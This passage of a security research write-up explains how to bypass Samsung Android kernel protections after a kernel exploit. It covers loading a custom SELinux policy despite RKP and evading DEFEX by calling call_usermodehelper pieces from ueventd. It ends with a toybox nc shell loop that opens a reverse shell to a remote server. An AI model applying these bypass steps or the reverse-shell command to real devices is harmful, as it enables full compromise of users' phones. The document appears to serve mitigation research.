Although ss_initialized variable is in RKP, we can still bypass SELinux by abusing SELinux policy related API in kernel space. At first, we need to analyze security_load_policy function.

// security/selinux/ss/services.c
int security_load_policy(void *data, size_t len)
{
	struct policydb *oldpolicydb, *newpolicydb;
	struct sidtab oldsidtab, newsidtab;
	struct selinux_mapping *oldmap, *map = NULL;
	struct convert_context_args args;
	u32 seqno;
	u16 map_size;
	int rc = 0;
	struct policy_file file = { data, len }, *fp = &file;

	oldpolicydb = kzalloc(2 * sizeof(*oldpolicydb), GFP_KERNEL);
	if (!oldpolicydb) {
		rc = -ENOMEM;
		goto out;
	}
	newpolicydb = oldpolicydb + 1;

	if (!ss_initialized) {
		avtab_cache_init();
		ebitmap_cache_init();
		rc = policydb_read(&policydb, fp);
		if (rc) {
			avtab_cache_destroy();
			ebitmap_cache_destroy();
			goto out;
		}
    
		...
  
#if (defined CONFIG_RKP_KDP && defined CONFIG_SAMSUNG_PRODUCT_SHIP)
     uh_call(UH_APP_RKP, RKP_KDP_X60, (u64)&ss_initialized, 1, 0, 0);

    ...

If SELinux is not initialized, avtab_cache and ebitmap_cache is initialized via kmem_cache_zalloc. avtab means access vector table which represents the type enforcement tables, and ebitmap means extensible bitmap which represents sets of values, such as types, roles, categories, and classes.

So, as if ss_initialized variable is 0, if we call avtab_cache_init and ebitmap_cache_init at first, because avtab_node_cachep, avtab_xperms_cachep, and ebitmap_node_cachep are not protected by RKP, these variables are reinitialized.

Next, copy our custom SELinux policy data to kernel space. Then call security_load_policy with our custom policy data. After clearing avc_cache, all SELinux policy is reloaded by our policy data.

Defeat DEFEX

Even if we successfully gain root privilege by exploiting kernel and bypass SELinux, due to DEFEX which is introduced after Oreo(Android 8), process's accessibility is still restricted.

This new protection prevents any process to run as root, based on defex_static_rules.

// security/samsung/defex_lsm/defex_rules.c
const struct static_rule defex_static_rules[] = {
	{feature_ped_path,"/"},
	{feature_safeplace_status,"1"},
	{feature_immutable_status,"1"},
	{feature_ped_status,"1"},
#ifndef DEFEX_USE_PACKED_RULES
	{feature_ped_exception,"/system/bin/run-as"},	/* DEFAULT */
	{feature_safeplace_path,"/init"},
	{feature_safeplace_path,"/system/bin/init"},
	{feature_safeplace_path,"/system/bin/app_process32"},
	{feature_safeplace_path,"/system/bin/app_process64"},
  
  ...

task_defex_enforce() function internally calls task_defex_check_creds() to check whether target process is weird or not. As following code shows, it will check 3 things to determine ALLOW or DENY.

  1. Whether current process is root (uid == 0 || gid == 0)
  2. Whether parent process is not root.
  3. Whether current process is DEFEX protected process.
// security/defex_lsm/defex_procs.c
#ifndef CONFIG_SECURITY_DSMS
static int task_defex_check_creds(struct task_struct *p)
#else
static int task_defex_check_creds(struct task_struct *p, int syscall)
#endif /* CONFIG_SECURITY_DSMS */
{
...
		if (CHECK_ROOT_CREDS(p) && !CHECK_ROOT_CREDS(p->real_parent) &&
			task_defex_is_secured(p)) {
		set_task_creds(p->pid, dead_uid, dead_uid, dead_uid);
		if (p->tgid != p->pid)
			set_task_creds(p->tgid, dead_uid, dead_uid, dead_uid);
		case_num = 4;
		goto show_violation;
	}
...

Therefore, if above 3 conditions are satisfied, DEFEX will return -DEFEX_DENY with error logs. And task_defex_enforce()� is called in very basic operations, so if untrusted app gains root privilege by exploiting kernel, it's basic operations like open/read/write/execve are restricted.

// security/samsung/defex_lsm/defex_procs.c
int task_defex_enforce(struct task_struct *p, struct file *f, int syscall)
{
	int ret = DEFEX_ALLOW;
	int feature_flag;
	const struct local_syscall_struct *item;
	struct defex_context dc;

...

#ifdef DEFEX_SAFEPLACE_ENABLE
	/* Safeplace feature */
	if (feature_flag & FEATURE_SAFEPLACE) {
		if (syscall == __DEFEX_execve) {
			ret = task_defex_safeplace(&dc);
			if (ret == -DEFEX_DENY) {
				if (!(feature_flag & FEATURE_SAFEPLACE_SOFT)) {
					kill_process(p);
					goto do_deny;
				}
			}
		}
	}
#endif /* DEFEX_SAFEPLACE_ENABLE */
  
...

fs/exec.c:
  1983  #ifdef CONFIG_SECURITY_DEFEX
  1984: 	retval = task_defex_enforce(current, file, -__NR_execve);
  1985  	if (retval < 0) {

fs/open.c:
  1083  #ifdef CONFIG_SECURITY_DEFEX
  1084: 		if (!IS_ERR(f) && task_defex_enforce(current, f, -__NR_openat)) {
  1085  			fput(f);

fs/read_write.c:
  568  #ifdef CONFIG_SECURITY_DEFEX
  569: 		if (task_defex_enforce(current, file, -__NR_write))
  570  			return -EPERM;

And call_usermodehelper also uses do_execve as following code shows, old way using this method to getting privileged method is blocked by DEFEX.

static int call_usermodehelper_exec_async(void *data)
{
	...
	new = prepare_kernel_cred(current);
	...
	commit_creds(new);
	...
	retval = do_execve(getname_kernel(sub_info->path),
			   (const char __user *const __user *)sub_info->argv,
			   (const char __user *const __user *)sub_info->envp);
  ...

In addition to DEFEX in do_execve, before calling call_usermodehelper_exec_async, call_usermodehelper_exec do another DEFEX check like following code snippet.

 int call_usermodehelper_exec(struct subprocess_info *sub_info, int wait)
 {
     DECLARE_COMPLETION_ONSTACK(done);
     int retval = 0;
   
		...

#if defined(CONFIG_SECURITY_DEFEX) && ANDROID_VERSION >= 100000 /* Over Q in case of Exynos */
     if (task_defex_user_exec(sub_info->path)) {
         goto out;
     }
 #endif

		...
      
	  queue_work(system_unbound_wq, &sub_info->work);

   	...

Above task_defex_user_exec is newly added to Samsung Galaxy's kernel in Sep, 2020 firmware update.

DEFEX Bypass

As we saw above part, just calling call_usermodehelper doesn't work due to newly updated DEFEX. But, ueventd is root privileged process and its parent process is init process. And also it is not protected by DEFEX.

As similar to the way we bypass SELinux restriction, to bypass new DEFEX, all we need to do is calling call_usermodehelper's subroutines separately in ueventd process.

  1. Set call_usermodehelper_setup's arguments in kernel memory via arbitrary kernel write primitive.
  2. Call call_usermodehelper_setup with our arguments via arbitrary kernel function call primitive.
  3. Read and Copy system_unbound_wq and sub_info data.
  4. Call queue_work with copied system_unbound_wq and sub_info.
  5. Due to DEFEX check in do_execve, we use shellscript like /system/bin/sh -c "while [ 1 ] ; do /system/bin/toybox nc ..." because /system/bin/sh has feature_safeplace_path attribute.

In this way, we can get reverse shell from remote server with full kernel privilege.

DEMO

Conclusion

Currently Android and iOS both are trying to prevent attacker from exploit their resources. Basically exterminating all bugs is impossible, so their focus is on hardening mitigations by introducing CFI like mechanisms. Although these mitigations surprisingly decrease exploitation success rate, we can always find bypass methods in their development assumption.